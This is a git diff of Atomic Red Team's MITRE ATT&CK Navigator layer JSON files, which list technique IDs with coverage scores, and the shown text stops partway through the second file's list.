-{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqu
eID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":
100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"e
nabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":
100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled"
:true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqu
eID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","sco
re":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1140","score":10
0,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","sco
re":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled"
:true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 17eb2eaef3..72e91a1e74 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1
037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"ena
bled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score
":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.0
